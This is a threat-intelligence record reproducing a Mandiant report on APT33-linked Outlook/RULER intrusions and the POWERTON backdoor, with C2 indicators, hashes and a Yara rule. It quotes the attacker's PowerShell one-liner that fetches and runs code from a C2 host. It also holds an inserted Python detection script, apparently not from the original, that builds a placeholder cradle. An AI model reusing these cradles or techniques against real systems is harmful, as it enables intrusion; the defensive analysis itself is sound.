{
	"id": "6857b892-6953-432b-9865-469e8d7834ae",
	"created_at": "2026-04-06T00:07:51.919473Z",
	"updated_at": "2026-04-10T13:12:37.612181Z",
	"deleted_at": null,
	"sha1_hash": "1fc6791fb71ecfa5313ee905ad90932325dbacd5",
	"title": "OVERRULED: Containing a Potentially Destructive Adversary | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1032306,
	"plain_text": "OVERRULED: Containing a Potentially Destructive Adversary |\r\nMandiant\r\nBy Mandiant\r\nPublished: 2018-12-21 · Archived: 2026-04-05 18:16:24 UTC\r\nWritten by: Geoff Ackerman, Rick Cole, Andrew Thompson, Alex Orleans, Nick Carr\r\nUPDATE (Jul. 3, 2019): On May 16, 2019 FireEye's Advanced Practices team attributed the remaining \"suspected APT33\r\nactivity\" (referred to as GroupB in this blog post) to APT33, operating at the behest of the Iranian government. The malware\r\nand tradecraft in this blog post are consistent with the June 2019 intrusion campaign targeting U.S. federal government\r\nagencies and financial, retail, media, and education sectors – as well as U.S. Cyber Command's July 2019 CVE-2017-11774\r\nindicators, which FireEye also attributes to APT33. FireEye's rigorous process for clustering and attributing this activity is\r\nalso explored in this blog's \"Identifying the Overlap\" section.\r\nIntroduction\r\nFireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry.\r\nPublic reporting indicates this activity may be related to recent destructive attacks. FireEye's Managed Defense has\r\nresponded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in\r\nearly phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an\r\nattempt to circumvent our detection.\r\nOn Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity targeting Energy and\r\nAerospace industries. Recent public reporting indicated possible links between the confirmed APT33 spear phishing and\r\ndestructive SHAMOON attacks; however, we were unable to independently verify this claim. 
FireEye’s Advanced Practices\r\nteam leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions\r\nagainst our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple\r\nintrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the\r\nintrusions using an internally-developed similarity engine described below. Additionally, public discussions have also\r\nindicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.\r\n45 days ago, during 24x7 monitoring, #ManagedDefense detected \u0026 contained an attempted intrusion from newly-identified adversary infrastructure*. It is C2 for a code family we track as POWERTON.\r\n*hxxps://103.236.149[.]100/api/info — FireEye (@FireEye) December 15, 2018\r\nIdentifying the Overlap in Threat Activity\r\nFireEye augments our expertise with an internally-developed similarity engine to evaluate potential associations and\r\nrelationships between groups and activity. Using concepts from document clustering and topic modeling literature, this\r\nengine provides a framework to calculate and discover similarities between groups of activities, and then develop\r\ninvestigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the\r\nengineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available\r\norganic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium\r\nconfidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed\r\nan operational timeline based on confirmed APT33 activity observed in the last year. 
We compared that to the timeline of the\r\ncontained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection\r\nduring specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog\r\ncontains original source material only, whereas Finished Intelligence including an all-source analysis is available within our\r\nintelligence portal. To best understand the techniques employed by the adversary, it is necessary to provide background on\r\nour Managed Defense response to this activity during their 24x7 monitoring.\r\nManaged Defense Rapid Responses: Investigating the Attacker\r\nIn mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the\r\nengineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost’s RULER, to\r\nconfigure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled\r\nWebDAV server 85.206.161[.]214@443\\outlook\\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f).\r\nThe payload was an AutoIT downloader that retrieved and executed additional PowerShell from\r\nhxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system’s architecture,\r\ndownloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or\r\n0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or\r\nhttps://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\r\nPage 1 of 7\n\n17587668AC577FCE0B278420B8EB72AC). The actor leveraged a publicly available exploit for CVE-2017-0213 to\r\nescalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly\r\navailable MIMIKATZ to presumably steal additional credentials. 
Managed Defense aided the victim in containing the\r\nintrusion.\r\nFireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for\r\nattribution, we found it remarkable that out of the specified sampling, the actor’s IMPHASH was found in only six samples,\r\ntwo of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to\r\nAPT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.\r\nIn mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The\r\nactor leveraged stolen credentials and RULER’s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying\r\nnumerous users’ Outlook client homepages for code execution and persistence. These methods are further explored in this\r\npost in the \"RULER In-The-Wild\" section.\r\nThe actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available\r\n.NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed\r\nDefense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that\r\nAPT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.\r\nDuring the July activity, Managed Defense observed three variations of the homepage exploit hosted at\r\nhxxp://91.235.116[.]212/index.html. 
One example is shown in Figure 1.\r\nFigure 1: Attacker’s homepage exploit (CVE-2017-11774)\r\nThe main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the\r\nappropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named “Media.ps1” within the user’s\r\n%LOCALAPPDATA% directory (%LOCALAPPDATA%\\MediaWs\\Media.ps1) as shown in Figure 2.\r\nFigure 2: Attacker’s “Media.ps1” script\r\nThe purpose of “Media.ps1” was to decode and execute the downloaded binary payload, which was written to disk as\r\n“C:\\Users\\Public\\Downloads\\log.dat”. At a later stage, this PowerShell script would be configured to persist on the host via\r\na registry Run key.\r\nAnalysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager\r\nwritten to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These\r\nparticular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The\r\nimplant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and\r\nsubsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following\r\ninformation:\r\nUsername and domain\r\nComputer name\r\nCPU details\r\nCurrent exe PID\r\nConfigured C2 server\r\nThe C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that\r\nestablished persistence for the aforementioned “Media.ps1” PowerShell script, which then decodes and executes the\r\nPOSHC2 binary upon system startup. 
During the identified July 2018 activity, the POSHC2 variants were configured with a\r\nkill date of July 29, 2018.\r\nPOSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON\r\n(hxxps://185.161.209[.]172/api/info). The adversary had limited success interacting with POWERTON during this\r\ntime. The actor was able to download and establish persistence for an AutoIt binary named “ClouldPackage.exe” (MD5:\r\n46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON “persist” command. The sole\r\nfunctionality of “ClouldPackage.exe” was to execute the following line of PowerShell code:\r\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object\r\nSystem.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public',\r\n'fN^4zJp{5w#K0VUm}Z_a!QXr*]\u00262j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')\r\nThe purpose of this code is to retrieve “silent mode” POWERTON from the C2 server. Note that the actor protected their\r\nfollow-on payloads with strong credentials, so the second stage cannot be retrieved from the URL alone, and that the\r\none-liner disables TLS certificate validation before the download. Shortly after this, Managed Defense contained the intrusion.\r\nStarting approximately three weeks later, the actor reestablished access through a successful password spray. Managed\r\nDefense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They\r\nmade some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection.\r\nThe actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations\r\nof “index.html” were identified during this period. 
Two of these variations contained encoded PowerShell code written to\r\ndownload new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.\r\nFigure 3: OS-specific POSHC2 Downloader\r\nFigure 3 shows that the actor made some minor changes, such as encoding the PowerShell \"DownloadString\" commands\r\nand renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download\r\nthe POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file\r\ndropped to decode and execute the POSHC2 variant also changed to “Vision.ps1”. During this August 2018 activity, the\r\nPOSHC2 variants were configured with a “kill date” of Aug. 13, 2018. Note that a kill date, which guardrails an intrusion by\r\ntime, is functionality built into the POSHC2 framework rather than an addition by this actor.\r\nOnce again, POSHC2 was used to download a new variant of POWERTON (MD5: c38069d0bc79acdc28af3820c1123e53),\r\nconfigured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late August, after the POSHC2 kill\r\ndate, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages\r\npreviously observed.\r\nDue to Managed Defense’s early containment of these intrusions, we were unable to ascertain the actor’s motivations;\r\nhowever, it was clear they were adamant about gaining and maintaining access to the victim’s network.\r\nAdversary Pursuit: Infrastructure Monitoring\r\nAdvanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at\r\nscale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16\r\nand Oct. 11, 2018. On at least Oct. 
11, 2018, the adversary changed the payload (MD5:\r\n8be06571e915ae3f76901d52068e3498) to download and execute a POWERTON sample from\r\nhxxps://103.236.149[.]100/api/info (MD5: 4047e238bbcec147f8b97d849ef40ce5). This specific URL was identified in a\r\npublic discussion as possibly related to recent destructive attacks. We are unable to independently verify this correlation with\r\nany organic information we possess.\r\nOn Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload\r\nhosted at hxxp://89.45.35[.]235/index.html (MD5: f0fe6e9dde998907af76d91ba8f68a05). The payload was crafted to\r\ndownload and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5:\r\n53ae59ed03fa5df3bf738bc0775a91d9).\r\nTable 1 contains the operational timeline for the activity we analyzed.\r\nDATE/TIME (UTC) NOTE INDICATOR\r\n2017-08-15 17:06:59 APT33 – EMPIRE (Used) 8a99624d224ab3378598b9895660c890\r\n2017-09-15 16:49:59 APT33 – PUPYRAT (Compiled) 4b19bccc25750f49c2c1bb462509f84e\r\n2017-11-12 20:42:43 GroupA – AUT2EXE Downloader (Compiled) 95f3bea43338addc1ad951cd2d42eb6f\r\n2017-11-14 14:55:14 GroupA – PUPYRAT (Used) 17587668ac577fce0b278420b8eb72ac\r\n2018-01-09 19:15:16 APT33 – PUPYRAT (Compiled) 56f5891f065494fdbb2693cfc9bce9ae\r\n2018-02-13 13:35:06 APT33 – PUPYRAT (Used) 56f5891f065494fdbb2693cfc9bce9ae\r\n2018-05-09 18:28:43 GroupB – AUT2EXE (Compiled) 46038aa5b21b940099b0db413fa62687\r\n2018-07-02 07:57:40 APT33 – POSHC2 (Used) fa7790abe9ee40556fb3c5524388de0b\r\n2018-07-16 00:33:01 GroupB – POSHC2 (Compiled) 75e680d5fddbdb989812c7ba83e7c425\r\n2018-07-16 01:39:58 GroupB – POSHC2 (Used) 75e680d5fddbdb989812c7ba83e7c425\r\n2018-07-16 08:36:13 GroupB – POWERTON (Used) 46038aa5b21b940099b0db413fa62687\r\n2018-07-31 22:09:25 APT33 – POSHC2 (Used) 129c296c363b6d9da0102aa03878ca7f\r\n2018-08-06 16:27:05 GroupB – POSHC2 (Compiled) fca0ad319bf8e63431eb468603d50eff\r\n2018-08-07 05:10:05 GroupB – POSHC2 (Used) 
75e680d5fddbdb989812c7ba83e7c425\r\n2018-08-29 18:14:18 APT33 – POSHC2 (Used) 5832f708fd860c88cbdc088acecec4ea\r\n2018-10-09 16:02:55 APT33 – POSHC2 (Used) 8d3fe1973183e1d3b0dbec31be8ee9dd\r\n2018-10-09 16:48:09 APT33 – POSHC2 (Used) 48d1ed9870ed40c224e50a11bf3523f8\r\n2018-10-11 21:29:22 GroupB – POWERTON (Used) 8be06571e915ae3f76901d52068e3498\r\n2018-12-13 11:00:00 GroupB – POWERTON (Identified) 99649d58c0d502b2dfada02124b1504c\r\nTable 1: Operational Timeline\r\nOutlook and Implications\r\nIf the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained\r\nproprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use.\r\nFireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to\r\ncritical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting\r\naligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical\r\nproduction.\r\nWe will continue to track these clusters independently until we achieve high confidence that they are the same. The\r\noperators behind each of the described intrusions are using publicly available but not widely understood tools and\r\ntechniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion\r\nactivity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by\r\nAdvanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients\r\nevery advantage they can have against sophisticated adversaries. 
We welcome additional original source information we can\r\nevaluate to confirm or refute our analytical judgements on attribution.\r\nCustom Backdoor: POWERTON\r\nPOWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a\r\nsimilar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence\r\nmechanisms, including WMI and an auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and leverage\r\nAES encryption for communication traffic to and from the C2. POWERTON typically gets deployed as a later stage\r\nbackdoor and is obfuscated with several layers.\r\nFireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and\r\nPOWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump\r\npassword hashes.\r\nTable 2 contains samples of POWERTON.\r\nHash of Obfuscated File (MD5) Hash of Deobfuscated File (MD5) Version\r\n974b999186ff434bee3ab6d61411731f 3871aac486ba79215f2155f32d581dc2 V1\r\ne2d60bb6e3e67591e13b6a8178d89736 2cd286711151efb61a15e2e11736d7d2 V1\r\nbd80fcf5e70a0677ba94b3f7c011440e 5a66480e100d4f14e12fceb60e91371d V1\r\n4047e238bbcec147f8b97d849ef40ce5 f5ac89d406e698e169ba34fea59a780e V2\r\nc38069d0bc79acdc28af3820c1123e53 4aca006b9afe85b1f11314b39ee270f7 V2\r\nN/A 7f4f7e307a11f121d8659ca98bc8ba56 V2\r\n53ae59ed03fa5df3bf738bc0775a91d9 99649d58c0d502b2dfada02124b1504c V2\r\nTable 2: POWERTON malware samples\r\nAdversary Methods: Email Exploitation on the Rise\r\nFor most organizations, Outlook and Exchange are synonymous with email access. User convenience is a primary driver behind\r\ntechnological advancements, but convenient access for users often reveals additional attack surface for adversaries. 
As\r\norganizations expose any email server access to the public internet for their users, those systems become intrusion vectors.\r\nFireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and\r\nOffice 365. Our Mandiant consultants also presented several new methods used by adversaries to subvert multifactor\r\nauthentication at FireEye Cyber Defense Summit 2018.\r\nAt FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred\r\nbased on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector\r\nis as follows.\r\nAn adversary has a single pair of valid credentials for a user within your organization obtained through any means, to\r\ninclude the following non-exhaustive examples:\r\nThird-party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for\r\nemail addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a\r\npersonal email address with a first and last name, and an affiliated password, compromised in a third-party breach\r\nsomewhere. Did they re-use that password?\r\nPrevious compromise within your organization where credentials were compromised but not identified or reset.\r\nPoor password choice or password security policies resulting in brute-forced credentials.\r\nGathering of crackable password hashes from various other sources, such as NTLM hashes gathered via documents\r\nintended to phish them from users.\r\nCredential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently\r\nelsewhere on the internet.\r\nOnce the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365\r\nthat is not protected with multi-factor authentication. 
The adversary leverages the stolen credentials and a tool like RULER\r\nto deliver exploits through Exchange’s legitimate features.\r\nRULER In-The-Wild: Here, There, and Everywhere\r\nSensePost’s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface\r\n(MAPI), or via remote procedure calls (RPC), both over HTTP. As detailed in the \"Managed Defense Rapid\r\nResponses\" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email\r\nclient process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an\r\nadversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with Aut2Exe (MD5:\r\n95f3bea43338addc1ad951cd2d42eb6f), and executed a PowerShell one-liner to retrieve further malicious content.\r\nWithout the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious\r\nmail rule created using the aforementioned tooling for the following reasons:\r\nOutlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is\r\nunexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a\r\nprocess ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process\r\ninjection would imply prior malicious code execution on the host, which evidence did not support.\r\nThe transfer of 95f3bea43338addc1ad951cd2d42eb6f was over WebDAV. 
RULER facilitates this by exposing a\r\nsimple WebDAV server, and a command-line module for creating a client-side mail rule to point at that WebDAV\r\nhosted payload.\r\nThe choice of WebDAV for this initial transfer of the stager is the result of restrictions in mail rule creation; the payload\r\nmust be \"locally\" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or\r\nFTP are not permitted. This is thoroughly detailed in Silent Break Security's initial write-up prior to RULER’s\r\ncreation. This leaves SMB and WebDAV via UNC file paths as the available options for transferring your\r\nmalicious payload via an Outlook rule. WebDAV is likely the less alerting option from a networking perspective, as\r\none is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a\r\ndomain-joined host communicating via SMB to a non-domain-joined host at an arbitrary IP address.\r\nThe payload to be executed via an Outlook client-side mail rule must contain no arguments, which is likely why a\r\ncompiled Aut2exe executable was chosen. 95f3bea43338addc1ad951cd2d42eb6f does nothing but execute a\r\nPowerShell one-liner to retrieve additional malicious content for execution; executing that one-liner directly from an\r\nOutlook rule was not possible due to this limitation.\r\nWith that in mind, the initial infection vector is illustrated in Figure 4.\r\nFigure 4: Initial infection vector\r\nAs both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly\r\nadopted. SensePost's identification and responsible disclosure of CVE-2017-11774 was no different. 
For an excellent\r\ndescription of abusing Outlook's home page for shell and persistence from an attacker’s perspective, refer to SensePost's\r\nblog.\r\nFireEye has observed and documented an uptick in several malicious attackers' usage of this specific home page exploitation\r\ntechnique. Based on our experience, this particular method may be more successful due to defenders misinterpreting\r\nartifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful\r\nCVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this\r\nobservation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta)\r\nattachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption\r\noverlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise\r\nmay be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're\r\nincluding a Yara rule to differentiate these Outlook home page payloads at the end of this post.\r\nUnderstanding this nuance further highlights the exposure to this technique when combined with password spraying as\r\ndocumented with this attacker, and underscores the importance of layered email security defenses, including multi-factor\r\nauthentication and patch management. We recommend that organizations reduce their email attack surface as much as\r\npossible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software\r\nclients used to access that server are patched. 
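The Yara rule included at the end of this post, together with the encoded PowerShell stages described above (the one-liner run by ClouldPackage.exe and the encoded DownloadString commands in the index.html variants), can be folded into one triage script. The Python below is an added example written for this page; it is not code from the original post, from FireEye, or from SensePost. It re-implements the rule condition (not a PE, contains <htm and <script, and references ViewCtl1, its CLSID, or .OutlookApplication, matched as ASCII or UTF-16LE), then peels base64 layers out of a file or a command line and names the cradle behaviours it finds. The homepage sample, the placeholder credentials, the c2.example.invalid URL and the indicator names are all constructed for the example.

```python
# Added example for this page, not code from the Mandiant post, FireEye or SensePost.
# Re-implements the Yara condition from the end of the post and peels the base64
# PowerShell layers found in the homepage payloads. All samples are constructed.
import base64
import re

CLSID_VIEWCTL1 = '0006F063-0000-0000-C000-000000000046'
B64_RUN = re.compile('[A-Za-z0-9+/]{32,}={0,2}')     # candidate base64 blobs
TOKEN_SPLIT = re.compile('[^a-z0-9-]+')              # word boundaries for iex/wmic checks


def has_string(data: bytes, needle: str, nocase: bool = True) -> bool:
    # Emulates the yara modifiers: ascii and wide (UTF-16LE), optionally nocase.
    hay = data.lower() if nocase else data
    n = needle.lower() if nocase else needle
    return n.encode('ascii') in hay or n.encode('utf-16-le') in hay


def is_outlook_homepage_payload(data: bytes) -> bool:
    # Same condition as Hunting_Outlook_Homepage_Shell_and_Persistence:
    # uint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*)
    if data[:2] == b'MZ':
        return False
    script = has_string(data, '<htm') and has_string(data, '<script')
    viewctl = (has_string(data, 'ViewCtl1')
               or has_string(data, CLSID_VIEWCTL1, nocase=False)
               or has_string(data, '.OutlookApplication'))
    return script and viewctl


def decode_base64_layers(text: str) -> list:
    # -EncodedCommand blobs are UTF-16LE; POSHC2-style string payloads are usually UTF-8.
    layers = []
    for blob in B64_RUN.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:          # binascii.Error is a ValueError: not real base64
            continue
        if len(raw) >= 4 and raw[1] == 0 and raw[3] == 0:
            layers.append(raw.decode('utf-16-le', errors='ignore'))
        else:
            layers.append(raw.decode('utf-8', errors='ignore'))
    return layers


def cradle_indicators(text: str) -> list:
    # Behaviours from the ClouldPackage.exe one-liner and the index.html variants.
    low = text.lower()
    tokens = set(TOKEN_SPLIT.split(low))
    found = []
    if 'servercertificatevalidationcallback' in low:
        found.append('tls_validation_disabled')
    if any(m in low for m in ('downloadstring', 'downloadfile', 'downloaddata')):
        found.append('webclient_download')
    if 'iex' in tokens or 'invoke-expression' in tokens:
        found.append('invoke_expression')
    if 'networkcredential' in low:
        found.append('credentialed_fetch')
    if 'wmic' in tokens:
        found.append('wmic_profiling')
    return found


def analyze(data: bytes) -> dict:
    # Outer text plus two levels of decoded base64, as the actor layered them in August 2018.
    text = data.decode('utf-8', errors='ignore')
    seen = set(cradle_indicators(text))
    layers = decode_base64_layers(text)
    for layer in layers:
        seen.update(cradle_indicators(layer))
        for inner in decode_base64_layers(layer):
            seen.update(cradle_indicators(inner))
    return {'homepage_payload': is_outlook_homepage_payload(data),
            'layers': len(layers),
            'indicators': sorted(seen)}


# Constructed stand-in for the cradle run by ClouldPackage.exe; credentials and host are placeholders.
CRADLE = ('''[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; '''
          '''$webclient = New-Object System.Net.WebClient; '''
          '''$webclient.Credentials = New-Object System.Net.NetworkCredential('public', 'REDACTED'); '''
          '''iex $webclient.DownloadString('https://c2.example.invalid/api/default')''')
ENCODED = base64.b64encode(CRADLE.encode('utf-16-le')).decode('ascii')

# Constructed homepage file that carries the strings the Yara rule keys on; not the real exploit.
HOMEPAGE_TEMPLATE = '''<html><head>
<object classid='clsid:@CLSID@' id='ViewCtl1'></object>
<script>
var cmd = 'powershell.exe -NoP -W Hidden -EncodedCommand @ENC@';
var app = ViewCtl1.OutlookApplication;
</script></head><body></body></html>'''
HOMEPAGE_SAMPLE = (HOMEPAGE_TEMPLATE.replace('@CLSID@', CLSID_VIEWCTL1)
                   .replace('@ENC@', ENCODED).encode('utf-8'))
BENIGN_HTML = b'<html><head><script>document.title = 1;</script></head><body>hi</body></html>'
PE_STUB = b'MZ' + b'<html><script>ViewCtl1.OutlookApplication</script>'   # PE: rule must not fire

if __name__ == '__main__':
    for name, blob in (('homepage', HOMEPAGE_SAMPLE), ('benign', BENIGN_HTML), ('pe', PE_STUB)):
        print(name, analyze(blob))
    print('cmdline', cradle_indicators(CRADLE))
```

Run it over quarantined copies of suspicious index.html files or over PowerShell command lines pulled from process-creation logs. A homepage_payload hit that also carries tls_validation_disabled and credentialed_fetch is the combination seen in the August 2018 activity, and it means the actor already holds a valid mailbox credential, so the follow-up is a credential and mailbox review rather than a phishing-only triage.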
Beyond implementing multi-factor authentication for Office 365/Exchange\r\naccess, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are\r\nexposed for exploitation by toolkits such as SensePost’s RULER.\r\nTable 3: Outlook attack surface mitigations\r\nDetecting the Techniques\r\nFireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON.\r\nTable 4 contains several specific detection names that applied to the email exploitation and initial infection activity.\r\nPLATFORM SIGNATURE NAME\r\nEndpoint Security:\r\nPOWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY)\r\nSUSPICIOUS POWERSHELL USAGE (METHODOLO\r\nSTEALER)\r\nRULER OUTLOOK PERSISTENCE (UTILITY)\r\nNetwork and Email Security (Network Traffic):\r\nFE_Exploit_HTML_CVE201711774\r\nFE_HackTool_Win_RULER\r\nFE_HackTool_Linux_RULER\r\nFE_HackTool_OSX_RULER\r\nFE_Tro\r\nTable 4: FireEye product detections\r\nFor organizations interested in hunting for Outlook home page shell and persistence, we’ve included a Yara rule that can also\r\nbe used for context to differentiate these payloads from other scripts:\r\nrule Hunting_Outlook_Homepage_Shell_and_Persistence\r\n{\r\nmeta:\r\n author = \"Nick Carr (@itsreallynick)\"\r\n reference_hash = \"506fe019d48ff23fac8ae3b6dd754f6e\"\r\n strings:\r\n $script_1 = \"\u003chtm\" ascii nocase wide\r\n $script_2 = \"\u003cscript\" ascii nocase wide\r\n $viewctl1_a = \"ViewCtl1\" ascii nocase wide\r\n $viewctl1_b = \"0006F063-0000-0000-C000-000000000046\" ascii wide\r\n $viewctl1_c = \".OutlookApplication\" ascii nocase wide\r\n condition:\r\n uint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*)\r\n}\r\nAcknowledgements\r\nThe authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects,\r\nOmar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued\r\ncomprehensive Outlook 
client exploitation product coverage.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html"
	],
	"report_names": [
		"overruled-containing-a-potentially-destructive-adversary.html"
	],
	"threat_actors": [
		{
			"id": "a63c994f-d7d6-4850-a881-730635798b90",
			"created_at": "2025-08-07T02:03:24.788883Z",
			"updated_at": "2026-04-10T02:00:03.785146Z",
			"deleted_at": null,
			"main_name": "COBALT TRINITY",
			"aliases": [
				"APT33",
				"Elfin",
				"HOLMIUM",
				"MAGNALIUM",
				"Peach Sandstorm",
				"Refined Kitten",
				"TA451"
			],
			"source_name": "Secureworks:COBALT TRINITY",
			"tools": [
				"AutoCore",
				"Cadlotcorg",
				"Dello RAT",
				"FalseFont",
				"Imminent Monitor",
				"KDALogger",
				"Koadic",
				"NanoCore",
				"NetWire",
				"POWERTON",
				"PoshC2",
				"Poylog",
				"PupyRAT",
				"Schoolbag"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "e5ff825b-0456-4013-b90a-971b93def74a",
			"created_at": "2022-10-25T15:50:23.824058Z",
			"updated_at": "2026-04-10T02:00:05.377261Z",
			"deleted_at": null,
			"main_name": "APT33",
			"aliases": [
				"APT33",
				"HOLMIUM",
				"Elfin",
				"Peach Sandstorm"
			],
			"source_name": "MITRE:APT33",
			"tools": [
				"PowerSploit",
				"AutoIt backdoor",
				"PoshC2",
				"Mimikatz",
				"NanoCore",
				"DEADWOOD",
				"StoneDrill",
				"POWERTON",
				"LaZagne",
				"TURNEDUP",
				"NETWIRE",
				"Pupy",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b23e717c-0b27-47e0-b3c8-4defe6dd857f",
			"created_at": "2023-01-06T13:46:38.367369Z",
			"updated_at": "2026-04-10T02:00:02.945356Z",
			"deleted_at": null,
			"main_name": "APT33",
			"aliases": [
				"Elfin",
				"MAGNALLIUM",
				"HOLMIUM",
				"COBALT TRINITY",
				"G0064",
				"ATK35",
				"Peach Sandstorm",
				"TA451",
				"APT 33",
				"Refined Kitten"
			],
			"source_name": "MISPGALAXY:APT33",
			"tools": [],
			"source_id": "MISPGALAXY",
